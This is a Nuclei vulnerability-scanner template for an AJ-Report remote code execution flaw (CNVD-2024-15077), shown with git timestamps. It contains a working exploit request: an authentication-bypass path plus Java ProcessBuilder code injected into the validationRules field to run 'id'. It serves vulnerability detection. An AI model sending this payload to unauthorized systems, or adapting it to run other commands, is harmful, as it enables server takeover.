nuclei-templates/http/cnvd/2024/CNVD-2024-15077.yaml

49 lines
2.2 KiB
YAML
Raw Normal View History

2024-05-28 01:50:55 +00:00
id: CNVD-2024-15077
2024-05-23 13:01:42 +00:00
info:
name: AJ-Report Open Source Data Screen - Remote Code Execution
author: pussycat0x
severity: high
description: |
AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
reference:
- https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
2024-05-28 01:50:55 +00:00
- https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:anji-plus:aj-report:*:*:*:*:*:*:*:*
2024-05-23 13:01:42 +00:00
metadata:
2024-05-28 01:50:55 +00:00
verified: true
max-request: 1
2024-09-10 08:22:50 +00:00
vendor: anji-plus
2024-09-10 09:08:16 +00:00
product: aj-report
fofa-query: title="AJ-Report"
2024-05-28 01:50:55 +00:00
tags: cnvd,cnvd2024,aj-report,rce
2024-05-23 13:01:42 +00:00
http:
- raw:
- |
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json;charset=UTF-8
2024-05-23 13:13:24 +00:00
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2024-05-27 15:40:27 +00:00
2024-05-23 13:01:42 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "code"
- "data"
condition: and
- type: regex
part: body
regex:
2024-05-27 15:40:27 +00:00
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
2024-05-23 13:01:42 +00:00
- type: status
status:
- 200
2024-09-12 05:14:01 +00:00
# digest: 4b0a00483046022100ea321f23afa50746a734ada8d1fc448c56422cb2132aa769845f235eb1c1b566022100be0a93e4243e8affe2d1e21189f33a471b7372198b12133716f7cc209220383a:922c64590222798bb761d5b6d8e72950